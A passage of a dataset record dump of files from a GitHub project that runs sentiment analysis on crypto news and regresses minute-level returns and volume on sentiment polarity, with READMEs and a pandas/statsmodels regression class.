outfile)\r\n\r\n" }, { "alpha_fraction": 0.7582417726516724, "alphanum_fraction": 0.7653061151504517, "avg_line_length": 46.185184478759766, "blob_id": "9b22cb4ba278f0398eb57ee8304fea8ed4044c95", "content_id": "23d6a815ae6df5befda93c3afe9ed2658aa4a64c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 130, "num_lines": 27, "path": "/analysis_scripts/README.md", "repo_name": 
"jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#analysis Scripts\n\n##merge_news_and_minute.py\nScript merges the crypto data and the news data with a left outer join with the crypto minute data as the left database\n\n\n##sentiment_analyzer.py\nThis file takes the processed data files and calculates their sentiment polarity and subjectivity score using the TextBlob Library\n\n\n##OLS_regression_analysis.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. \nCalculates a linear regression model using the following formula syntax: \"y-hat ~ x1 + x2 + ... + xn\"\n\nRegressions I ran:\n1. log_return ~ sent_polarity\n2. log_return ~ sent_polarity + sent_polarity^2\n3. log_return ~ sent_polarity + sent_polarity^3\n4. log_return ~ sent_polarity + [high_sent_polarity] //dummy variable signifying sentiments of values higher than .5\n\n##get_regresssion_results.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. \nA script to view the regression model and saves it to a pickle file (saved python object)\n\n##plot_regression_results.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. 
\nMakes a plot of the regression coefficients side by side to look for effectiveness.\n" }, { "alpha_fraction": 0.5961538553237915, "alphanum_fraction": 0.6346153616905212, "avg_line_length": 39.599998474121094, "blob_id": "c7d400654e9c2d59ffcf816db9a227bf6d430ab8", "content_id": "3ce2c7fc84594f3af2b66486537186a72aee01f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 104, "num_lines": 5, "path": "/util.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "def all_coins_all_years(*funcs, years=[2018,2019], coins = ['bitcoin','ethereum', 'zcash', 'litecoin']):\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\tfor func in funcs:\n\t\t\t\tfunc(coin = coin, year = year)\n\t\t\t\t\t" }, { "alpha_fraction": 0.7547445297241211, "alphanum_fraction": 0.7605839371681213, "avg_line_length": 56.08333206176758, "blob_id": "478939f6563d70f4d1f9f128628791ce374ac142", "content_id": "3f72918ea4265fb07f84268585f7ee1629ebbb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 685, "license_type": "no_license", "max_line_length": 194, "num_lines": 12, "path": "/text_cleaning_scripts/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "# Text Cleaning Scripts\n\n## text_cleaning.py\nThis file will be doing all the necessary preprocessing for a NLP type project. It does the following:\n\n1. removes all punctuation from the data\n2. removes stopwords from data (i.e. the, a, an, etc). Words that don't have any inherent meaning to them\n3. Lemmatizes the words. This changes past and future tenses to the present tense. (i.e decreasing -> decrease, increased -> increase, etc)\n4. removes HTML tags like <b>.\n\n## datetime_editor.py\nThis file converts all the datetime data into a usable format, and extracts meaningful information out of it, i.e. 
what day of the week it was published on, whether or not it was a weekend, etc.\n" }, { "alpha_fraction": 0.6978257298469543, "alphanum_fraction": 0.7079267501831055, "avg_line_length": 34.400001525878906, "blob_id": "1dbb8c04519737344d5294b4e094201fd6a30af0", "content_id": "c4c6cad83536fe1f48f9f5a5cd5fe4ef8873b1a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5841, "license_type": "no_license", "max_line_length": 272, "num_lines": 165, "path": "/analysis_scripts/ols_regression.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#work with the dataframes in merged_dataframes\nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sn; sn.set()\nfrom sklearn.linear_model import LinearRegression\nfrom numpy import array, isnan, power\nimport statsmodels.api as sm \nfrom statsmodels.formula.api import ols\nfrom statistics import mean\n\n#i'll delete this later\n# pd.set_option('display.max_rows', None)\n# pd.options.display.max_rows\nclass regression_analyzer:\n\tdef __init__(self, year, coin, time=1, no_zeros=False, dependent_variable=None):\n\t\tself.year=year\n\t\tself.coin=coin\n\t\t#refers to how many minutes ahead we want to try to predict the return\n\t\tself.time=time\n\t\t#removes all the zeroes from the dataframe\n\t\tif no_zeros:\n\t\t\tself.df = pd.read_csv(f'../dataframes/merged_dataframes/{year}_{coin}_merged_df.csv')\n\t\t\tself.df = self.df[self.df['sentiment_polarity'] != 0]\n\t\t\tself.df['Date'] = pd.to_datetime(self.df['Date'])\n\t\t#keeps the zeroes in the dataframe\n\t\telse:\n\t\t\tself.df = pd.read_csv(f'../dataframes/merged_dataframes/{year}_{coin}_merged_df.csv')\n\t\t\tself.df['Date'] = pd.to_datetime(self.df['Date'])\n\n\t\tself.df['high_sentiment'] = self.df['sentiment_polarity'].apply(lambda sentiment : 1 if sentiment > .8 else 0)\n\n\t\tself.dependent_variable = dependent_variable\n\tdef 
main(self):\n\t\tprint(self.df.columns)\n\t\t\n\n\tdef plot_sentiment_by_return(self):\n\t\t# plt.plot(self.df[f'{dependent_variable}'][::-1])\n\t\t# plt.scatter(range(len(self.df['sentiment_polarity'])), self.df['sentiment_polarity'][::-1])\n\t\tdf = self.df.dropna()\n\t\tplt.scatter(df['sentiment_polarity'], df[f'{self.dependent_variable}'][::-1])\n\t\tplt.show()\n\n\n\tdef run_regression(self, formula, save=False):\n\t\t#use aggregate if you want a rolling average for a period of time.\n\t\t#use shifted if you want direct implication of each article\n\t\tdf = self.aggregate_df()\n\t\ttry: \n\t\t\t#generate model\n\t\t\tmodel = ols(formula=formula, data=df)\n\t\texcept:\n\n\t\t\tprint('error: ')\n\t\t\tprint('formula: ', formula)\n\t\t\tprint(df)\n\t\t\traise('error with ols')\n\n\n\t\tresults = model.fit()\n\t\t\n\t\tprint(results.summary())\n\t\tprint(\"parameters\", results.params)\n\t\tprint(\"r^2\", results.rsquared)\n\n\t\tprint(results.params.index)\n\n\t\t#creates a model name based \n\t\t# model_name = '+'.join([variable for variable in list(results.params.index[1:])])\n\t\tif save:\n\t\t\tmodel_name = f'regression_models/{self.dependent_variable}_predictions/{self.coin}/{formula} {self.year}_{self.time}_minute.pickle'\n\t\t\tresults.save(model_name)\n\t\t\tprint(f'saved \"{model_name}.pickle\" saved to disk')\n\n\t\treturn results\n\n\n\tdef shift_df(self):\n\t\tdf = self.df.drop_duplicates('Date')\n\n\t\tlog_returns_shifted = df[[\"Date\", f\"{self.dependent_variable}\"]][self.time:].reset_index()\n\t\tprint('hit')\n\n\t\tsentiment_polarity_shifted = df[['Date', 'sentiment_polarity']][:-1*self.time]\n\n\n\t\tdf_dropped_nans = self.df.dropna()\n\n\t\tnew_df = log_returns_shifted.merge(sentiment_polarity_shifted, left_index=True, right_index=True).dropna()\n\n\tdef aggregate_df(self, df=[0], authors=None):\n\n\t\tif len(df) > 1:\n\t\t\t#if a df is given to the function, then we reassign df as a df with the authors\n\t\t\tprint(authors)\n\t\t\tdf = 
df[['Date', f'{self.dependent_variable}','sentiment_polarity', 'high_sentiment', 'publisher'] + authors].drop_duplicates('Date')\n\n\t\telse:\n\t\t\t#otherwise, we want the df to simply have these three columns\n\t\t\tdf = self.df[['Date', f'{self.dependent_variable}','sentiment_polarity', 'high_sentiment', 'publisher']].drop_duplicates('Date')\n\t\t\n\n\n\t\t#gets the articles released on the same and averages them\n\t\t#computes a rolling average based on the time attribute, which signifies how \n\t\t#many minutes in the future we want to find a prediction\n\t\t#the shift method will sihft the aggregate polarity to a location self.time units away\n\t\t#this will make it on the same row as the Closing Return that we want to run the regression against\n\t\tdf['aggregate_polarity'] = df['sentiment_polarity'].rolling(self.time, min_periods=1).mean().shift(-1*self.time+1)\n\t\t\n\t\t#if we've given the dataframe the extra author columns\n\t\tprint(len(df.columns))\n\t\tprint(df.columns)\n\t\tif len(df.columns) > 6:\n\t\t\tdf[authors] = df[authors].rolling(self.time, min_periods=1).sum().shift(-1*self.time+1)\n\n\t\t#gives you every element we want to know about\n\t\tdf = df.iloc[::self.time,:]\n\t\t\n\t\t#removes nas to reduce computational time\n\t\tdf = df[df['aggregate_polarity'].notna()]\n\n\t\treturn df\n\n\n\tdef get_author_dummy_variables(self):\n\t\tprint(self.df.columns)\n\n\t\t#gets me a list of all authors in the data set\n\t\tauthors = list(self.df['publisher'].drop_duplicates().dropna())\n\n\t\t#creates a data frame of dummy variables in the dataframe\n\t\tauthor_dummies =pd.get_dummies(self.df['publisher'])\n\n\n\t\tcombined = self.df.merge(author_dummies, left_index=True, right_index=True)\n\n\t\tprint(len(author_dummies))\n\t\tprint(len(self.df))\n\t\tprint(len(combined))\n\n\t\tprint(combined[authors].sum().sum())\n\t\tcrash=crash\n\t\t\n\t\treturn combined, author_dummies.columns\n\n\nif __name__ == '__main__':\n\t#currently dropping all articles 
that were released at the same minute.\n\t#time is in minutes: 1 = 1 minute shift; 60 minutes = 1 hour; 1440 minutes = 1 day\n\t# analyzer = regression_analyzer(2018, 'bitcoin', no_zeros=False, time=1)\n\t\t\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\ttimes = [1,5,30,60,1440]\n\tyears = [2018, 2019]\n\t#should either be Volume, or log_returns\n\tdependent_variable = 'Volume'\n\t\n\tformulas = [f'{dependent_variable} ~ aggregate_polarity',f'{dependent_variable} ~ aggregate_polarity + power(aggregate_polarity, 2)', f'{dependent_variable} ~ aggregate_polarity + power(aggregate_polarity,3)',f'{dependent_variable} ~ aggregate_polarity + high_sentiment']\n\n\tfor formula in formulas:\n\t\tfor coin in coins:\n\t\t\tfor time in times:\n\t\t\t\tanalyzer = regression_analyzer(2019, coin, no_zeros=False, time=time, dependent_variable=dependent_variable)\n\t\t\t\tanalyzer.run_regression(formula=formula, save=True)\n" } ]
15
tarnjeetsingh/Instabot
https://github.com/tarnjeetsingh/Instabot
98d848e5565319fd8d6471ec3b6b44d68f0c278f
470b3cef34500f87d218098c6ec8a6eb4815a431
8c2c080f2d1602287e6ba107f3311d1eba4dbc5c
refs/heads/master
2020-12-02T20:56:42.441644
2017-07-24T16:18:05
2017-07-24T16:18:05
96,231,890
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6096649169921875, "alphanum_fraction": 0.6224441528320312, "avg_line_length": 48.36214828491211, "blob_id": "b4a6b8384e7ae987232b70843cbb8cf5d0859c24", "content_id": "ca59c69609f66013fe62e647127c3e3d24655db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21128, "license_type": "no_license", "max_line_length": 124, "num_lines": 428, "path": "/instabot.py", "repo_name": "tarnjeetsingh/Instabot", "src_encoding": "UTF-8", "text": "import requests\nimport urllib\nfrom textblob import TextBlob\nfrom textblob.sentiments import NaiveBayesAnalyzer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Acess token of the user\napp_access_token = '1552927974.120ce8d.08ca68409d6745a7867e181ceea6bb00'\napp_access_token1 = '5716224141.120ce8d.c167843111af45c299db71bed6bb0cb2'\n# Base url for instagram API\nbase = 'https://api.instagram.com/v1/'\n\n# Creating a function to start our INSTABOT\ndef start_bot():\n show_menu = True\n # Loop to show the choice menu again and again\n while show_menu:\n menu_choices = \"What do you want to do? \\n1. Get information about yourself \\n\" \\\n \"2. Get the user id of the instagrammer \\n\" \\\n \"3. Get information about a particular instagrammar \\n\" \\\n \"4. Get most recent post by yourself \\n\" \\\n \"5. Get most recent post of an Instagrammar \\n\" \\\n \"6. Get the recently liked media by yourself \\n\" \\\n \"7. Like a post \\n\" \\\n \"8. Get list of comment on a post \\n\" \\\n \"9. Comment on a post \\n\" \\\n \"10. delete negative comments from a post \\n\" \\\n \"11. Get user interests \\n\" \\\n \"12. 
Close the application\"\n menu_choice = raw_input(menu_choices)\n # Exception handling is employed for the validation of the choice\n try:\n menu_choice = int(menu_choice)\n # Option to obtain information about yourself\n if menu_choice == 1:\n self_info()\n # Option to get user id of an instagrammar\n elif menu_choice == 2:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_id(username)\n # Option to get information about an instagrammar\n elif menu_choice == 3:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_info(username)\n # Option to the most recent post of yourself\n elif menu_choice == 4:\n get_own_post()\n # Option to get most recent post of an instagrammar\n elif menu_choice == 5:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_post(username)\n # Option to get most recently liked media by the user\n elif menu_choice == 6:\n get_own_likes()\n # Option to like the most recent post of an instagrammar\n elif menu_choice == 7:\n username = raw_input(\"please enter username of the instagrammar\")\n like_a_post(username)\n # Option to get list of comments on post of an instagrammar\n elif menu_choice == 8:\n username = raw_input(\"please enter username of the instagrammar\")\n get_comments_on_post(username)\n # Option to post a comment on most recent post of an instagrammar\n elif menu_choice == 9:\n username = raw_input(\"please enter username of the instagrammar\")\n post_a_comment(username)\n # Option to delete the negative comments from the most recent post of an instagrammar\n elif menu_choice == 10:\n username = raw_input(\"please enter username of the instagrammar\")\n delete_negative_comment(username)\n # Option to close the INSTABOT\n elif menu_choice == 11:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_interests(username)\n elif menu_choice == 12:\n show_menu = False\n\n # piece of code to be executed if niether of the above 
conditions are met\n elif menu_choice > 11 or menu_choice < 1:\n print 'Please enter a valid choice from the options listed above'\n except ValueError:\n print 'Invalid value entered'\n print 'Please enter a valid choice'\n\n# Function to get self info about the user\ndef self_info():\n # Creating request url for self info\n request_url = (base+'users/self/?access_token=%s') % (app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_info = requests.get(request_url).json()\n\n # If the status code is 200 i.e sucess\n if user_info['meta']['code']==200:\n # Check if the data exists in the json object\n if len(user_info['data']):\n # Printing name of user, followers, following, number of posts\n print 'Username: %s' % (user_info['data']['username'])\n print 'No. of followers: %s' % (user_info['data']['counts']['followed_by'])\n print 'No. of people you are following: %s' % (user_info['data']['counts']['follows'])\n print 'No. 
of posts: %s' % (user_info['data']['counts']['media'])\n # If user_info object contains no data then printing the message\n else:\n print 'User does not exist!'\n # If the status code other than 200 is received then printing the appropriate message\n else:\n print 'Status code other than 200 received!'\n\n# Function to get user id of a instagram user by passing the username of instagram user as the parameter\ndef get_user_id(insta_username):\n # Making the request url by using API and joining access token with it\n request_url = (base+'users/search?q=%s&access_token=%s') % (insta_username, app_access_token)\n # Printing the request url\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_info['meta']['code'] == 200:\n # Checking if user_info object contains data\n if len(user_info['data']):\n return user_info['data'][0]['id']\n # Printing message if there is no data in json object\n else:\n print 'No user id found'\n return None\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n exit()\n\n# Function to get information about a user by passing the username of the instagram user as a parameter\ndef get_user_info(insta_username):\n # Using get user id function to get the user of the user\n user_id = get_user_id(insta_username)\n # If no user id with such username exists then printing appropriate message\n if user_id == None:\n print 'User does not exist!'\n exit()\n # Otherwise formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/%s?access_token=%s') % (user_id, app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n 
user_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_info['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(user_info['data']):\n # Printing name of user, followers, following, number of posts\n print 'Username: %s' % (user_info['data']['username'])\n print 'No. of followers: %s' % (user_info['data']['counts']['followed_by'])\n print 'No. of people you are following: %s' % (user_info['data']['counts']['follows'])\n print 'No. of posts: %s' % (user_info['data']['counts']['media'])\n # If user_info object contains no data then printing the message\n else:\n print 'There is no data for this user!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n\n# Function to get the most recent post of user itself\ndef get_own_post():\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/self/media/recent/?access_token=%s') % (app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in own_media\n own_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if own_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(own_media['data']):\n # Using the urllib to download the most recent post\n image_name = own_media['data'][0]['id'] + '.jpeg'\n image_url = own_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print 'Post does not exist!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n return None\n\n# Function to get the most recent post of 
the instagram user\ndef get_user_post(insta_username):\n # Using get user id function to get the user id of the user\n user_id = get_user_id(insta_username)\n # If no user id with such username exists then printing appropriate message\n if user_id == None:\n print 'User does not exist!'\n exit()\n # Otherwise formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/%s/media/recent/?access_token=%s') % (user_id, app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(user_media['data']):\n # Using the urllib to download the most recent post\n image_name = user_media['data'][0]['id'] + '.jpeg'\n image_url = user_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print \"There is no recent post!\"\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print \"Status code other than 200 received!\"\n return None\n\n# Function to get the most recent liked pic\ndef get_own_likes():\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'users/self/media/liked?access_token=%s') % (app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in own_media\n own_media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if own_media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(own_media['data']):\n # Printing 
the id of the most recently liked media\n print 'id '+own_media['data'][0]['user']['id']\n print 'url ' + own_media['data'][1]['images']['thumbnail']['url']\n # Using the urllib to download the most recent post\n image_name = own_media['data'][0]['id'] + '.jpeg'\n image_url = own_media['data'][0]['images']['standard_resolution']['url']\n urllib.urlretrieve(image_url, image_name)\n print 'Your image has been downloaded!'\n # If there is no recent post then printing the message\n else:\n print \"There is no recent post!\"\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print \"Status code other than 200 received!\"\n\n# Function to get the post id for a post by the instagram user\ndef get_post_id(insta_username):\n # Using get user id function to get the user id of the user\n user_id = get_user_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'users/%s/media/recent/?access_token=%s') % (user_id, app_access_token)\n # Hitting the url and using the json function to decode the object and storing it in media variable\n media = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if media['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(media['data']):\n return media['data'][0]['id']\n # If media object contains no data then printing the message\n else:\n print 'There is no such post id!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print'Status code other than 200 received'\n\n# Function to post a like on the post of a intagram user\ndef like_a_post(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API\n request_url = (base+'media/%s/likes') %(media_id)\n # Making a payload variable to be attached with the url\n 
payload = {\"access_token\": app_access_token}\n print 'POST request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_a_like object\n post_a_like = requests.post(request_url, payload).json()\n # Checking if the status code is 200 i.e success\n if post_a_like['meta']['code'] == 200:\n print 'Like was successful!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Your like was unsuccessful. Try again!'\n\n# Function to comments on the post of a intagram user\ndef get_comments_on_post(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'media/%s/comments/?access_token=%s') % (media_id, app_access_token)\n print ('GET request url: %s') % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in comments_info object\n comments_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if comments_info['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(comments_info['data']):\n print 'All the comments have been properly fetched!'\n print 'Comments are as follows'\n # Using the for loop to print the comments on the post\n for index,val in enumerate(comments_info['data']):\n print comments_info['data'][index]['text']\n return comments_info\n # If media object contains no data then printing the message\n else:\n print 'There is no comments on the post'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'There was some error in fetching of the comments please try again!'\n\n# Function to post a comment on the post of a intagram user\ndef post_a_comment(insta_username):\n # Using get media id function to get the user of the 
user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+'media/%s/comments') %(media_id)\n # Making a payload variable to be attached with the url\n payload = {\"access_token\": app_access_token, \"text\": 'test'}\n print 'POST request url : %s' %(request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_comment\n post_comment = requests.post(request_url,payload).json()\n # Checking if the status code is 200 i.e success\n if post_comment['meta']['code'] == 200:\n print 'Comment was successful!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Your comment was unsuccessful. Please try again!'\n\n# Function to analyze the comments on the post os the instagram user and deleting the comment if it is in negative sentiment\ndef delete_negative_comment(insta_username):\n # Using get media id function to get the user of the user\n media_id = get_post_id(insta_username)\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base + 'media/%s/comments/?access_token=%s') % (media_id, app_access_token)\n print ('GET request url: %s') %(request_url)\n # Hitting the url and using the json function to decode the object and storing it in post_comment\n comments_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if comments_info['meta']['code'] == 200 :\n # Check if the data exists in the json object\n if len(comments_info['data']):\n # using the blob library to analyze the comment\n blob = TextBlob(comments_info['data'][0]['text'],analyzer=NaiveBayesAnalyzer())\n print blob.sentiment\n print blob.sentiment[0]\n # Checking if the blob sentiment is positive or negative\n if blob.sentiment[0] == 'neg':\n comment_id = comments_info['data'][0]['id']\n print comment_id\n # Formalising the url 
to delete the comment\n delete_url = (base+'media/%s/comments/%s?access_token=%s') %(media_id, comment_id, app_access_token)\n # Hitting the url to delete the comment and store them in the delete_comment json object\n delete_comment = requests.delete(delete_url).json()\n # Checking if the status code is 200 i.e success\n if delete_comment['meta']['code'] == 200:\n print 'your comment was analyze to be negative and so has been deleted'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'your comment is negative but it was not deleted. Please try again!'\n # If media object contains no data then printing the message\n else:\n print 'There are no existing comments on this post'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received'\n\n# Fuction to get user interest from the tags\ndef get_user_interests(insta_username):\n user_id = get_user_id(insta_username)\n request_url = (base+'users/%s/media/recent/?access_token=%s') %(user_id, app_access_token)\n tags_info = requests.get(request_url).json()\n if tags_info['meta']['code'] == 200:\n if len(tags_info['data']):\n print 'tags are as follows'\n tags_list = []\n yo = []\n for index,val in enumerate(tags_info['data']):\n for index1, val in enumerate(tags_info['data'][index]['tags']):\n tags_list.append(tags_info['data'][index]['tags'][index1])\n tags_list.sort()\n tags_list = [x.encode('UTF8') for x in tags_list]\n wordfreq = []\n new = []\n for w in tags_list:\n if w not in new:\n new.append(w)\n wordfreq.append(1)\n else:\n if w in new:\n b = new.index(w)\n c = wordfreq[b]\n c = c+1\n wordfreq[b] = c\n\n new = (zip(new, wordfreq))\n print new\n data = []\n for h in range(10):\n data.append(new[h])\n\n n_groups = len(data)\n\n vals_films = [x[1] for x in data]\n legends_films = [x[0] for x in data]\n\n fig, ax = plt.subplots()\n\n index = np.arange(n_groups)\n bar_width = 0.02\n\n opacity = 
0.4\n\n rects1 = plt.bar(index, vals_films, bar_width,\n alpha=opacity,\n color='b',\n label='Ocurrences')\n\n plt.xlabel('Occurrences')\n plt.ylabel('Words')\n plt.title('Occurrences by word')\n plt.xticks(index + bar_width, legends_films)\n plt.legend()\n\n plt.tight_layout()\n plt.show()\n\n\n else:\n print 'There is no data in the object'\n else:\n print 'Status code other than 200 received'\n\n# Calling the start_bot function to start our application\nstart_bot()\n\n" } ]
1
turnerjrobbins/swarm-mqp
https://github.com/turnerjrobbins/swarm-mqp
9a885c1ac7fa0aa1040941a3d3c630f956b2081e
9095c76283dfcccad6fb3c78175234930a109f7d
6333d3c0cfad11c24611395e7ae44a61c0612548
refs/heads/master
2021-09-13T18:25:22.448020
2018-02-27T01:04:05
2018-02-27T01:04:05
111,338,451
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.753439724445343, "alphanum_fraction": 0.760594367980957, "avg_line_length": 61.68965530395508, "blob_id": "7db416286445180e0aa2918dbfbf742b02c2fc56", "content_id": "3ebae48741554debba6e7ffe7e913d31ee34d6ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1817, "license_type": "no_license", "max_line_length": 140, "num_lines": 29, "path": "/ugv_diffusion_occupancy/todo.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "initial experiment setup - DONE\n\nModify the 'pheromone' functionality to update occupancy grid\n -the SetOccupancy() function in occupancy_medium takes in a CVector2 position and needs to \n convert that to a cell, then set the occupancy for that cell (in the occupancy map).\n -the actuator needs to call the SetOccupacy function with a position during update if some flag is set to true\n -the controller needs to set the actuator flag to true if it detects a wall/obstacle and false if it sees nothing. \n\n Note: the actuator gets a reference to the CEntity it's attached to (see SetRobot function)\nso, how do we let the actuator know where to 'lay occupancy'?\ncormier uses m_pcEmbodiedEntity->GetOriginAnchor().Position to get the position of the robot, but we need the position + some offset. 
\n\nIdea: the actuator holds a list of positions to send to the medium (like a buffer) that the controller can fill using some exposed function.\nExample: \n\t* controller sees an object at {2,2}\n\t* controller calls actuator->objAtPosition({2,2}), which adds {2,2} to the actuator's list\n\t* during actuator's update loop the actuator calls the occupancy_medium->SetOccupancy() function with each position in its list\n\n\n\nMake KheperaIV controller w/ occupancy actuator \tDONE - 35 minutes\nMake kheperaIV experiment\t\t\t\t\t\t\tDONE - 30 minutes\nGet it to run\t\t\t\t\t\t\t\t\t\tDONE - 30 minutes (still need to either add a proximity sensor or make it use lidar for the diffusion)\nUpdate occupancy medium to keep track of occupancy\nupdate occupancy visualizer to show occupancy\n\n--------------------------OCTOMAP--------------------------\nModify the kheperaiv_occupancy_controller to call the loop function's insert ray method.\n\targos::CSimulator::GetLoopFunctions() - returns a reference to the loop functions associated to the current experiment" }, { "alpha_fraction": 0.7468643188476562, "alphanum_fraction": 0.7537057995796204, "avg_line_length": 20.414634704589844, "blob_id": "68809a8b8b3232f34f52abdcb3277dca725a0fb8", "content_id": "69bde5afe0854b8a08091ee42d7a5f4594a7c021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 877, "license_type": "no_license", "max_line_length": 100, "num_lines": 41, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/octomap_manager.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCTOMAP_MANAGER_H\n#define OCTOMAP_MANAGER_H\n\n#include <argos3/core/simulator/loop_functions.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n#include <argos3/core/simulator/space/space.h>\n\n#include <octomap/octomap.h>\n#include <octomap/OcTree.h>\n\n#define OCTCELLSIZE 0.04\n\nusing namespace argos;\nusing namespace 
octomap;\n\nclass CLoopOctomapManager : public CLoopFunctions {\npublic:\n\t//Constructor\n\tCLoopOctomapManager() : CLoopFunctions(), m_OcMap(OcTree(OCTCELLSIZE)) {} //Argument is resolution?\n\n\t//Destructor\n\t~CLoopOctomapManager() {}\n\n\tvirtual void Init(TConfigurationNode& t_tree);\n\n\tvirtual void Reset() {}\n\n\tvirtual void Destroy() {\n\t\tm_OcMap.writeBinary(\"diffusion_tree.bt\");\n\t}\n\n\tvirtual void PreStep() {}\n\n\tvirtual void PostStep();\n\n\tvoid insertRay();\nprivate:\n\toctomap::OcTree m_OcMap;\n\tCSpace::TMapPerType m_KheperaMap;\n};\n#endif" }, { "alpha_fraction": 0.7372525334358215, "alphanum_fraction": 0.7546490430831909, "avg_line_length": 32.979591369628906, "blob_id": "4e6725e999c50cef0c50a37e67c60c4a7555a1d7", "content_id": "37370760d29412628b3ef3e354ef952caa18db7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 91, "num_lines": 49, "path": "/pythonScripts/Stuehrmannfunctions.py", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "import numpy\nimport openCV\n\n#Function to transform UGV coords to global\n#Takes in coordinates of UAV in global frame and coordinates of UGV in UAV camera frame\ndef TransformtoGlobal(UAV_pos, UGV_pos):\n\t\n\treturn globalUGV\n#Function to filter UAV image for two points of color, find the midpoint of the\n#resultant line, and find the line orientation.\ndef ColorProcessing(cam_img, start_color, end_color):\n\tthresholded = thresholdImg(cam_img, start_color, end_color)\n\tUGV_camframepos = getMidpoint(thresholded)\n\tUGV_camframerot = getAngle(thresholded)\n\tUGV_campose = [UGV_camframepos, UGV_camframerot]\n\treturn UGV_campose\n#start_color and end_color are rgb values\ndef thresholdImg(cam_img, start_color, 